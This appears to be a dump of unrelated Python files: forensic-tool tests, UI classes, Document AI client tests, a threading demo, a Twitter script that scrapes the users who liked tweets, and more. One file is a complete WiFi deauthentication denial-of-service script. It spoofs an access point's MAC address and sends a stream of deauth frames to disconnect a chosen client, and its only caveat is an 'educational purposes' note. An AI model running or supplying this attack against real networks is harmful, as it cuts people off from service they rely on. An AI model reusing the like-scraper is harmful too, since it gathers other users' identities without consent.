            int.from_bytes(exponent_bytes, 'big'),
            int.from_bytes(modulus_bytes, 'big'),
        ).public_key(default_backend())

        # Wrap the key blob with RSA OAEP (MGF1 + SHA-256).
        wrapped_keys = public_key.encrypt(
            key_blob,
            padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                         algorithm=hashes.SHA256(),
                         label=None))

        # Final output: wrapped keys then cipher text, each base64-encoded.
        return base64.b64encode(wrapped_keys).decode() \
            + base64.b64encode(cipher_text).decode()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the artifacts attribute containers."""
import unittest
from plaso.containers import artifacts
from plaso.lib import definitions
from tests import test_lib as shared_test_lib
class EnvironmentVariableArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the environment variable artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        container = artifacts.EnvironmentVariableArtifact()
        self.assertEqual(
            sorted(container.GetAttributeNames()),
            ['case_sensitive', 'name', 'value'])
class HostnameArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the hostname artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        container = artifacts.HostnameArtifact()
        self.assertEqual(
            sorted(container.GetAttributeNames()), ['name', 'schema'])
class OperatingSystemArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the operating system artifact."""

    # pylint: disable=protected-access

    def testVersionTuple(self):
        """Tests the version_tuple property."""
        attribute_container = artifacts.OperatingSystemArtifact(version="5.1")
        self.assertEqual(attribute_container.version_tuple, (5, 1))

        # No version set: the property degrades to None.
        attribute_container = artifacts.OperatingSystemArtifact()
        self.assertIsNone(attribute_container.version_tuple)

        # Non-numeric version component: the property degrades to None.
        attribute_container = artifacts.OperatingSystemArtifact(version="5.a")
        self.assertIsNone(attribute_container.version_tuple)

    def testGetNameFromProduct(self):
        """Tests the _GetNameFromProduct function."""
        attribute_container = artifacts.OperatingSystemArtifact(
            product='Windows Server 2012 R2 Standard')
        name = attribute_container._GetNameFromProduct()
        self.assertEqual(name, 'Windows 2012 R2')

        attribute_container = artifacts.OperatingSystemArtifact(
            product='Microsoft Windows Server 2003')
        name = attribute_container._GetNameFromProduct()
        self.assertEqual(name, 'Windows 2003')

    def testIsEquivalent(self):
        """Tests the IsEquivalent function."""
        # Different products are not equivalent.
        win2k12_container = artifacts.OperatingSystemArtifact(
            product='Windows 2012')
        winxp_container = artifacts.OperatingSystemArtifact(product='Windows XP')
        self.assertFalse(win2k12_container.IsEquivalent(winxp_container))
        self.assertFalse(winxp_container.IsEquivalent(win2k12_container))

        # Same family, different versions are not equivalent.
        winnt62_container = artifacts.OperatingSystemArtifact(
            family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='6.2')
        winnt51_container = artifacts.OperatingSystemArtifact(
            family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='5.1')
        self.assertFalse(winnt62_container.IsEquivalent(winnt51_container))
        self.assertFalse(winnt51_container.IsEquivalent(winnt62_container))

        # Different families are not equivalent.
        win9x_container = artifacts.OperatingSystemArtifact(
            family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_9x)
        winnt_container = artifacts.OperatingSystemArtifact(
            family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT)
        self.assertFalse(win9x_container.IsEquivalent(winnt_container))
        self.assertFalse(winnt_container.IsEquivalent(win9x_container))

        # NT 5.1 and the product name "Windows XP" describe the same OS.
        winnt51_container = artifacts.OperatingSystemArtifact(
            family=definitions.OPERATING_SYSTEM_FAMILY_WINDOWS_NT, version='5.1')
        winxp_container = artifacts.OperatingSystemArtifact(product='Windows XP')
        self.assertTrue(winnt51_container.IsEquivalent(winxp_container))
        self.assertTrue(winxp_container.IsEquivalent(winnt51_container))

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        attribute_container = artifacts.OperatingSystemArtifact()
        expected_attribute_names = ['family', 'name', 'product', 'version']
        attribute_names = sorted(attribute_container.GetAttributeNames())
        self.assertEqual(attribute_names, expected_attribute_names)
class PathArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the path artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        path_artifact = artifacts.PathArtifact()
        self.assertEqual(
            sorted(path_artifact.GetAttributeNames()),
            ['data_stream', 'path_segment_separator', 'path_segments'])

    def testComparison(self):
        """Tests the comparison functions."""
        path_artifact = artifacts.PathArtifact(path='etc/issue')

        # An equal path satisfies ==, >= and <= but not >, < or !=.
        self.assertTrue(path_artifact == 'etc/issue')
        self.assertTrue(path_artifact >= 'etc/issue')
        self.assertFalse(path_artifact > 'etc/issue')
        self.assertTrue(path_artifact <= 'etc/issue')
        self.assertFalse(path_artifact < 'etc/issue')
        self.assertFalse(path_artifact != 'etc/issue')

        self.assertFalse(path_artifact == '/etc/issue')

    # TODO: add tests for _SplitPath.

    def testContainedIn(self):
        """Tests the ContainedIn function."""
        path_artifact = artifacts.PathArtifact(path='etc/issue')

        self.assertTrue(path_artifact.ContainedIn('/etc/issue'))
        self.assertTrue(path_artifact.ContainedIn('/usr/local/etc/issue'))
        self.assertFalse(path_artifact.ContainedIn('/etc/issue.net'))
class SourceConfigurationArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the source configuration artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        container = artifacts.SourceConfigurationArtifact()
        self.assertEqual(
            sorted(container.GetAttributeNames()),
            ['mount_path', 'path_spec', 'system_configuration'])
class SystemConfigurationArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the system configuration artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        container = artifacts.SystemConfigurationArtifact()
        self.assertEqual(
            sorted(container.GetAttributeNames()),
            ['available_time_zones', 'code_page', 'hostname',
             'keyboard_layout', 'operating_system',
             'operating_system_product', 'operating_system_version',
             'time_zone', 'user_accounts'])
class UserAccountArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the user account artifact."""

    def testGetAttributeNames(self):
        """Tests the GetAttributeNames function."""
        container = artifacts.UserAccountArtifact()
        self.assertEqual(
            sorted(container.GetAttributeNames()),
            ['full_name', 'group_identifier', 'identifier',
             'user_directory', 'username'])
class WindowsEventLogProviderArtifactTest(shared_test_lib.BaseTestCase):
    """Tests for the Windows EventLog provider artifact."""

    def testInitialize(self):
        """Tests the __init__ function."""
        self.assertIsNotNone(artifacts.WindowsEventLogProviderArtifact())
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
from .group import Group
from .widgets import Button, Slider
class Component:
    """Base UI element with an auto-generated tag and no-op event hooks."""

    made = 0  # per-class instance counter, used to build default tags

    def __init__(self, tag=None):
        cls = type(self)
        # Default tag: class name followed by the number of instances made
        # so far (e.g. "Component0", "Component1", ...).
        self.tag = cls.__name__ + str(cls.made) if tag is None else tag
        cls.made += 1

    def show(self, *args, **kwargs):
        """Draw hook; subclasses override."""

    def update(self, *args, **kwargs):
        """Per-frame update hook; subclasses override."""

    def onKeyDown(self, key):
        """Key-press hook; subclasses override."""

    def onKeyUp(self, key):
        """Key-release hook; subclasses override."""

    def onMouseMotion(self, position):
        """Mouse-move hook; subclasses override."""

    def onMouseButtonDown(self, button, position):
        """Mouse-press hook; subclasses override."""
class ComponentGroup(Component, Group):
    """A Component that is also a Group: broadcasts every hook to its members."""

    def __init__(self, *components, tag=None):
        Component.__init__(self, tag)
        Group.__init__(self, *components)

    def show(self, context):
        for element in self:
            element.show(context)

    def update(self, dt):
        for element in self:
            element.update(dt)

    def onKeyDown(self, key):
        for element in self:
            element.onKeyDown(key)

    def onKeyUp(self, key):
        # BUG FIX: the original forwarded key-up events to element.onKeyDown,
        # so members never received a key-release notification.
        for element in self:
            element.onKeyUp(key)

    def onMouseMotion(self, position):
        for element in self:
            element.onMouseMotion(position)

    def onMouseButtonDown(self, button, position):
        for element in self:
            element.onMouseButtonDown(button, position)
class Activity(ComponentGroup):
    """Base class Activity, inspired by Android Studio's Activity concept."""
    pass
class WidgetActivity(Activity):
    # An Activity whose first member is its widget group, exposed via the
    # `widgets` property.
    def __init__(self, widget_group, *args):
        super().__init__(widget_group, *args)

    def getWidgets(self):
        # The widget group is stored as the first element of the group.
        return self[0]

    def setWidgets(self, widgets):
        self[0] = widgets

    widgets = property(getWidgets, setWidgets)
class WidgetGroup(ComponentGroup):
    # A ComponentGroup that also keeps a direct reference to its widgets.
    def __init__(self, widgets):
        super().__init__()
        self.widgets = widgets
if __name__ == "__main__":
    # c1 = Component()
    # c2 = Component()
    # print(c1.tag, c2.tag)
    # Smoke test: build a widget group and wrap it in an Activity.
    # NOTE(review): Activity receives a *list* here, so the group's single
    # member is the list [wg] rather than wg itself — confirm intent.
    wg = WidgetGroup(Button.random("test"))
    a = Activity([wg])
#!/usr/bin/env pytest
# -*- coding: UTF-8 -*-
import json
import logging
import os
import sys
import unittest
from unittest import mock
# Make the repository root importable so the `webserver` package resolves
# when the tests are run from this directory.
testdir = os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../")
sys.path.append(testdir)
import webserver.main
from webserver.plugins.meta.baike import BaiduBaikeApi
# Initialize calibre once for the whole module before any test runs.
webserver.main.init_calibre()
# Canned Baidu Baike response (in Chinese) used to build the mock page below;
# the keys under "info" are Baike infobox field names.
BAIKE_DATA = {
    "info": {
        "作品名称": "东周列国志",
        "作者": "冯梦龙、蔡元放",
        "创作年代": "明代、清代",
        "文学体裁": "长篇历史演义小说",
        "字数": "800000",
        "title": "东周列国志(冯梦龙所著长篇历史小说)",
        "url": "https://baike.baidu.com/item/%E4%B8%9C%E5%91%A8%E5%88%97%E5%9B%BD%E5%BF%97/2653",
    },
    "tags": ["明代","长篇小说", "历史" ],
    "summary": "《东周列国志》是明末小说家冯梦龙著、清代蔡元放改编的长篇历史演义小说,成书于清代乾隆年间。《东周列国志》写的是西周结束(公元前789年)至秦统一六国(公元前221年),包括春秋、战国五百多年间的历史故事,内容相当丰富复杂。小说描写了周幽王凶残无道,周平王东迁,诸侯国争霸,士大夫势力日益壮大,最终形成七雄对峙局面;批判了昏庸愚昧的昏君暴君,揭示了战争给人民带来的深重灾难;歌颂了赏罚分明的王侯和有胆识的将相勇夫。小说的布局谋篇主次分明,错落有致。每一故事既可独立成篇,又可贯穿一体。人物形象栩栩如生,故事描写引人入胜。[1]",
    "id": "2653",
    "image": "https://bkimg.cdn.bcebos.com/pic/bd3eb13533fa828b9d95cebbf21f4134970a5a37?x-bce-process=image/resize,m_lfit,w_536,limit_1/format,f_jpg",
}
def get_mock_page():
    """Build a mock.Mock that mimics a fetched Baike page backed by BAIKE_DATA."""
    page = mock.Mock()
    page.get_id.return_value = BAIKE_DATA['id']
    page.get_tags.return_value = BAIKE_DATA['tags']
    page.get_info.return_value = BAIKE_DATA['info']
    page.get_image.return_value = BAIKE_DATA['image']
    page.get_summary.return_value = BAIKE_DATA['summary']
    page.http.url = BAIKE_DATA['info']['url']
    return page

# Shared fixture: one mock page reused by every test in this module.
BAIKE_PAGE = get_mock_page()
class TestBaike(unittest.TestCase):
    """Tests for the Baidu Baike metadata plugin."""

    def test_baike_api(self):
        api = BaiduBaikeApi(copy_image=False)
        with mock.patch.object(api, "_baike") as mk:
            # No page found -> get_book returns None.
            mk.return_value = None
            d = api.get_book("东周列国志")
            # IDIOM FIX: use assertIsNone/assertIsNotNone instead of
            # comparing to None with ==/!=.
            self.assertIsNone(d)

            # A mocked page is converted into book metadata.
            mk.return_value = BAIKE_PAGE
            d = api.get_book("东周")
            self.assertIsNotNone(d)
            self.assertEqual(d.title, "东周列国志(冯梦龙所著长篇历史小说)")
|
# Forbidden Words
class MedicalPaper:
    """A paper whose text is shown to, and believed by, whoever it treats."""

    def __init__(self, text):
        self.text = text
        self.color = 'red'
        self.text_color = 'golden'

    def treat(self, patient):
        """Expose *patient* to the paper's message: first seen, then believed."""
        patient.see(self.text)
        patient.believe(self.text)
# Demo scenario — not runnable as-is: `patient`, `criminal` and `paper` are
# never defined in this file, so executing these statements raises NameError.
# Kept verbatim as illustrative pseudo-code.
treatment = MedicalPaper('calm')
if patient.illness == 'bipolar disorder':
    treatment.treat(patient)
    patient.illness = ''
propaganda = MedicalPaper('patriotism')
if criminal.crime == 'treason':
    propaganda.treat(criminal)
    # NOTE(review): `paper` is undefined — presumably `propaganda` was meant.
    criminal.see(paper.text)
    criminal.believe(paper.text)
class Glasses:
    # Wearing these exposes the wearer to the module-level `propaganda` paper
    # and permanently fixes their target to its text.
    def wear(self, man):
        propaganda.treat(man)
        man.target = propaganda.text
        # Once set, the target can no longer be changed.
        man.target_changeable = False
harmony = Glasses()
# NOTE(review): `people` is undefined here, and `each.wear(harmony)` invokes
# wear() on the person rather than on the glasses — `harmony.wear(each)`
# looks like the intended call. Left unchanged.
for each in people:
    each.wear(harmony)
|
'''
Code: DeAuthenticating a WiFi Access Point and a WiFi Client
Author: Qaidjohar Jawadwala
Usage: python wifi_dos.py channel ap_mac client_mac count interface
Example: python wifi_dos.py 7 E8:94:F6:D5:83:5E 98:0C:A5:5B:61:0B 10 wlan0mon
Note: Only for educational purposes.
'''
from scapy.all import * #Import Scapy's packet crafting/sending API
conf.verb = 0 #Suppress Scapy's verbose per-packet output
import sys #Handle arguments and other system functions
import os #Running system commands
import time #Giving delay between frames
#Checking command line arguments
if(len(sys.argv) != 6):
    sys.exit("Invalid Arguments!!!\n Usage: python wifi_dos.py channel ap_mac client_mac count interface \n Example: python wifi_dos.py 7 E8:94:F6:D5:83:5E 98:0C:A5:5B:61:0B 10 wlan0mon")
#Assigning command line arguments to variables
channel = sys.argv[1]
ap_mac = sys.argv[2]
client_mac = sys.argv[3]
count = sys.argv[4]
interface = sys.argv[5]
#Configure Scapy to work on mentioned interface
conf.iface = interface
#Set the WiFi card to the target channel, e.g. `iw dev wlan0mon set channel 7`
# NOTE(review): interface/channel come straight from argv and are passed to a
# shell unquoted via os.system — acceptable for a local tool, but fragile.
channel_set = "iw dev "+interface+" set channel "+channel
os.system(channel_set)
#Create a deauthentication frame addressed to the client, spoofing the AP
#(addr1=destination, addr2=source, addr3=BSSID).
deAuthFrame = RadioTap()/Dot11(addr1=client_mac,addr2=ap_mac,addr3=ap_mac)/Dot11Deauth()
#print(deAuthFrame.show())
#Send `count` deauth frames, one every 0.5 seconds
for pkt in range(int(count)):
    #Sending DeAuthentication frame on Network
    sendp(deAuthFrame)
    print("["+str(pkt+1)+"] "+"Sending DeAuth- BSSID:"+ap_mac+" Client:"+client_mac)
    #Providing delay of 0.5 seconds
    time.sleep(0.5)
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 2 23:46:39 2019
@author: Ghayasuddin Adam
"""
import tweepy
from tweepy import Stream
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
#insert Twitter Keys
# Fill these in with your application's credentials before running.
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''
# Build an authenticated tweepy API client.
auth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
import urllib
import re
def get_user_ids_of_post_likes(post_id):
    """Scrape the user ids that liked a tweet via the favorited_popup endpoint.

    Returns a list of unique user-id strings, or False on an HTTP error.
    """
    # BUG FIX: the module only does `import urllib`, which does not make
    # urllib.request / urllib.error available; import the submodules
    # explicitly here so this function is self-sufficient.
    import urllib.request
    import urllib.error
    try:
        url = 'https://twitter.com/i/activity/favorited_popup?id=' + str(post_id)
        json_data = urllib.request.urlopen(url).read().decode('utf-8')
        # Each liker appears as an escaped data-user-id attribute.
        found_ids = re.findall(r'data-user-id=\\"+\d+', json_data)
        return list(set([re.findall(r'\d+', match)[0] for match in found_ids]))
    except urllib.error.HTTPError:
        return False
# Walk the user's full timeline, 200 tweets at a time (Twitter's page max).
screen_name = 'GhayasAdam'
alltweets = []
new_tweets = api.user_timeline(screen_name = screen_name,count=200)
alltweets.extend(new_tweets)
# Page backwards: request only tweets older than the oldest one seen so far.
oldest = alltweets[-1].id - 1
while len(new_tweets) > 0:
    new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
    alltweets.extend(new_tweets)
    oldest = alltweets[-1].id - 1
# Collect likers of every original (non-retweet) tweet that has likes.
# NOTE(review): get_user_ids_of_post_likes returns False on HTTP error,
# and extend(False) would raise TypeError — consider guarding the result.
ids = []
for i in range(0,len(alltweets)):
    if alltweets[i].favorite_count > 0 and alltweets[i].retweeted is False:
        ids.extend(get_user_ids_of_post_likes(alltweets[i].id))
uniqueids = set(ids)
# Print each unique liker's screen name.
for i in uniqueids:
    user = api.get_user(i)
    print (user.screen_name)
|
import pytups as pt
from .solution import Solution
from cornflow_client import ExperimentCore
from .instance import Instance
class Experiment(ExperimentCore):
    """Pairs a routing Instance with a (possibly empty) Solution."""

    def __init__(self, instance: Instance, solution: Solution):
        super().__init__(instance, solution)
        # Normalize "no solution yet" to an empty Solution object.
        if self.solution is None:
            self.solution = Solution(pt.SuperDict())

    def solve(self, options):
        """Solve the instance; implemented by concrete subclasses."""
        raise NotImplementedError()

    def get_objective(self):
        """
        Returns value of Objective Function: the total arc distance
        accumulated over every route in the solution.
        :return: summed distance
        """
        arcs_dict = self.instance.data["arcs"]
        routes = self.solution.data["routes"]
        distance = 0
        for key in routes:
            route = routes[key]
            # Sum the arc length between each consecutive pair of stops.
            for j in range(len(route) - 1):
                distance += arcs_dict[(route[j], route[j + 1])]
        return distance

    def check_solution(self, *args, **kwargs):
        # BUG FIX: the original *returned* a NotImplementedError instance
        # instead of raising it, so callers silently received an exception
        # object as a value.
        raise NotImplementedError()
|
import time
from threading import Thread, Event
import random
# Shared state: the list produced into / consumed from, and the Event used
# to signal "an item is available".
items = []
event = Event()
"""
Summary
event.wait() -> used by consumer to wait an event occurs to continue its processing
event.set() -> set the Event, notifying the consumer
event.clear() -> Event is set to false by clear() method"
"""
class consumer(Thread):
    # Consumer thread: waits on the shared Event, then pops one item.
    def __init__(self, items, event):
        Thread.__init__(self)
        self.items = items
        self.event = event

    def run(self):
        while True:
            time.sleep(2)
            # Block until the producer signals that an item was appended.
            self.event.wait()
            # NOTE(review): pop() on an empty list raises IndexError if the
            # wait/clear timing misfires — see the traceback quoted below.
            item = self.items.pop()
            print ('Consumer notify : %d popped from list by %s' %(item, self.name))
            print('###\nitems: {}'.format(items))
class producer(Thread):
    # Producer thread: appends random ints to the shared list and signals the
    # consumer through the Event.
    def __init__(self, integers, event):
        Thread.__init__(self)
        # NOTE(review): the `integers` parameter is ignored; the module-level
        # `items` list is used instead — confirm intent.
        self.items = items
        self.event = event

    def run(self):
        global item
        for i in range(100):
            time.sleep(2)
            item = random.randint(0, 256)
            self.items.append(item)
            print ('Producer notify : item %d appended to list by %s' % (item, self.name))
            print ('Producer notify : event set by %s' % self.name)
            self.event.set()
            # print ('Produce notify : event cleared by %s \n' % self.name)
            self.event.clear()  # if clear() is not run, the consumer may miss notifications due to a synchronization failure
# which then produces the following error:
"""
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.8/threading.py", line 932, in _boot
"""
# after the consumer thread errors out, the producer keeps appending items
# even though the consumer no longer consumes them
if __name__ == '__main__':
    # Start the producer and consumer on the shared list/event, then wait
    # for both to finish.
    t1 = producer(items, event)
    t2 = consumer(items, event)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from google import auth
from google.api_core import client_options
from google.api_core import future
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async
from google.api_core import operations_v1
from google.auth import credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
DocumentUnderstandingServiceAsyncClient,
)
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
DocumentUnderstandingServiceClient,
)
from google.cloud.documentai_v1beta2.services.document_understanding_service import (
transports,
)
from google.cloud.documentai_v1beta2.types import document
from google.cloud.documentai_v1beta2.types import document_understanding
from google.cloud.documentai_v1beta2.types import geometry
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.rpc import status_pb2 as status # type: ignore
def client_cert_source_callback():
    """Dummy client-certificate provider used by the mTLS tests below."""
    return (b"cert bytes", b"key bytes")
def test__get_default_mtls_endpoint():
    """The helper converts *.googleapis.com hosts to their mTLS variants."""
    convert = DocumentUnderstandingServiceClient._get_default_mtls_endpoint

    # None passes through untouched.
    assert convert(None) is None
    # Plain and sandbox endpoints gain the mtls. prefix.
    assert convert("example.googleapis.com") == "example.mtls.googleapis.com"
    assert (
        convert("example.sandbox.googleapis.com")
        == "example.mtls.sandbox.googleapis.com"
    )
    # Already-mTLS endpoints are idempotent.
    assert (
        convert("example.mtls.googleapis.com") == "example.mtls.googleapis.com"
    )
    assert (
        convert("example.mtls.sandbox.googleapis.com")
        == "example.mtls.sandbox.googleapis.com"
    )
    # Non-Google hosts pass through untouched.
    assert convert("api.example.com") == "api.example.com"
@pytest.mark.parametrize(
    "client_class",
    [DocumentUnderstandingServiceClient, DocumentUnderstandingServiceAsyncClient],
)
def test_document_understanding_service_client_from_service_account_file(client_class):
    """from_service_account_file/json both install the factory's credentials."""
    creds = credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_file"
    ) as factory:
        factory.return_value = creds

        client = client_class.from_service_account_file("dummy/file/path.json")
        assert client._transport._credentials == creds

        client = client_class.from_service_account_json("dummy/file/path.json")
        assert client._transport._credentials == creds

        # The regional default host is configured on the transport.
        assert client._transport._host == "us-documentai.googleapis.com:443"
def test_document_understanding_service_client_get_transport_class():
    """get_transport_class defaults to gRPC and accepts an explicit name."""
    expected = transports.DocumentUnderstandingServiceGrpcTransport
    assert DocumentUnderstandingServiceClient.get_transport_class() == expected
    assert (
        DocumentUnderstandingServiceClient.get_transport_class("grpc") == expected
    )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [
        (
            DocumentUnderstandingServiceClient,
            transports.DocumentUnderstandingServiceGrpcTransport,
            "grpc",
        ),
        (
            DocumentUnderstandingServiceAsyncClient,
            transports.DocumentUnderstandingServiceGrpcAsyncIOTransport,
            "grpc_asyncio",
        ),
    ],
)
def test_document_understanding_service_client_client_options(
    client_class, transport_class, transport_name
):
    """Exercises each api_endpoint / GOOGLE_API_USE_MTLS combination."""
    # NOTE(review): this test mutates os.environ directly; a failure midway
    # leaves GOOGLE_API_USE_MTLS set for subsequent tests.
    # Check that if channel is provided we won't create a new one.
    with mock.patch.object(
        DocumentUnderstandingServiceClient, "get_transport_class"
    ) as gtc:
        transport = transport_class(credentials=credentials.AnonymousCredentials())
        client = client_class(transport=transport)
        gtc.assert_not_called()

    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(
        DocumentUnderstandingServiceClient, "get_transport_class"
    ) as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()

    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            api_mtls_endpoint="squid.clam.whelk",
            client_cert_source=None,
            credentials=None,
            host="squid.clam.whelk",
        )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
    # "never".
    os.environ["GOOGLE_API_USE_MTLS"] = "never"
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class()
        patched.assert_called_once_with(
            api_mtls_endpoint=client.DEFAULT_ENDPOINT,
            client_cert_source=None,
            credentials=None,
            host=client.DEFAULT_ENDPOINT,
        )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
    # "always".
    os.environ["GOOGLE_API_USE_MTLS"] = "always"
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class()
        patched.assert_called_once_with(
            api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
            client_cert_source=None,
            credentials=None,
            host=client.DEFAULT_MTLS_ENDPOINT,
        )

    # Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
    # "auto", and client_cert_source is provided.
    os.environ["GOOGLE_API_USE_MTLS"] = "auto"
    options = client_options.ClientOptions(
        client_cert_source=client_cert_source_callback
    )
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
            client_cert_source=client_cert_source_callback,
            credentials=None,
            host=client.DEFAULT_MTLS_ENDPOINT,
        )

    # Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
    # "auto", and default_client_cert_source is provided.
    os.environ["GOOGLE_API_USE_MTLS"] = "auto"
    with mock.patch.object(transport_class, "__init__") as patched:
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=True,
        ):
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
                client_cert_source=None,
                credentials=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
            )

    # Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
    # "auto", but client_cert_source and default_client_cert_source are None.
    os.environ["GOOGLE_API_USE_MTLS"] = "auto"
    with mock.patch.object(transport_class, "__init__") as patched:
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=False,
        ):
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                api_mtls_endpoint=client.DEFAULT_ENDPOINT,
                client_cert_source=None,
                credentials=None,
                host=client.DEFAULT_ENDPOINT,
            )

    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS has
    # unsupported value.
    os.environ["GOOGLE_API_USE_MTLS"] = "Unsupported"
    with pytest.raises(MutualTLSChannelError):
        client = client_class()

    del os.environ["GOOGLE_API_USE_MTLS"]
def test_document_understanding_service_client_client_options_from_dict():
    """Client options supplied as a plain dict are honored like ClientOptions."""
    transport_path = (
        "google.cloud.documentai_v1beta2.services.document_understanding_service."
        "transports.DocumentUnderstandingServiceGrpcTransport.__init__"
    )
    with mock.patch(transport_path) as patched_init:
        patched_init.return_value = None
        DocumentUnderstandingServiceClient(
            client_options={"api_endpoint": "squid.clam.whelk"}
        )
        # The dict's api_endpoint must flow through to the transport host.
        patched_init.assert_called_once_with(
            api_mtls_endpoint="squid.clam.whelk",
            client_cert_source=None,
            credentials=None,
            host="squid.clam.whelk",
        )
def test_batch_process_documents(transport: str = "grpc"):
    """batch_process_documents forwards the request and yields an LRO future."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials(), transport=transport
    )
    # Proto3 makes every field optional, and the wire call is mocked out,
    # so an empty request suffices.
    request = document_understanding.BatchProcessDocumentsRequest()
    with mock.patch.object(
        type(client._transport.batch_process_documents), "__call__"
    ) as rpc:
        rpc.return_value = operations_pb2.Operation(name="operations/spam")
        response = client.batch_process_documents(request)
        # Exactly one stub invocation, carrying our request unchanged.
        assert len(rpc.mock_calls) == 1
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0] == request
    # The LRO surface wraps the raw operation in a Future.
    assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_batch_process_documents_async(transport: str = "grpc_asyncio"):
    """Async surface forwards the request and yields an LRO future."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials(), transport=transport
    )
    # Proto3 makes every field optional, and the wire call is mocked out,
    # so an empty request suffices.
    request = document_understanding.BatchProcessDocumentsRequest()
    with mock.patch.object(
        type(client._client._transport.batch_process_documents), "__call__"
    ) as rpc:
        rpc.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
        response = await client.batch_process_documents(request)
        # The stub saw a call carrying our request object unchanged.
        assert len(rpc.mock_calls)
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0] == request
    # The awaited result is wrapped as an LRO future.
    assert isinstance(response, future.Future)
def test_batch_process_documents_field_headers():
    """URI-bound request fields are propagated as routing headers."""
    client = DocumentUnderstandingServiceClient(
        credentials=credentials.AnonymousCredentials()
    )
    # A field that appears in the HTTP/1.1 URI must be echoed into the
    # x-goog-request-params metadata entry, so give it a non-empty value.
    request = document_understanding.BatchProcessDocumentsRequest()
    request.parent = "parent/value"
    with mock.patch.object(
        type(client._transport.batch_process_documents), "__call__"
    ) as rpc:
        rpc.return_value = operations_pb2.Operation(name="operations/op")
        client.batch_process_documents(request)
        # One stub call, carrying the request unchanged.
        assert len(rpc.mock_calls) == 1
        _, call_args, _ = rpc.mock_calls[0]
        assert call_args[0] == request
        # The routing header must ride along in the call metadata.
        _, _, call_kwargs = rpc.mock_calls[0]
        assert ("x-goog-request-params", "parent=parent/value") in call_kwargs["metadata"]
@pytest.mark.asyncio
async def test_batch_process_documents_field_headers_async():
    """Async variant: URI-bound request fields become routing headers."""
    client = DocumentUnderstandingServiceAsyncClient(
        credentials=credentials.AnonymousCredentials()
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
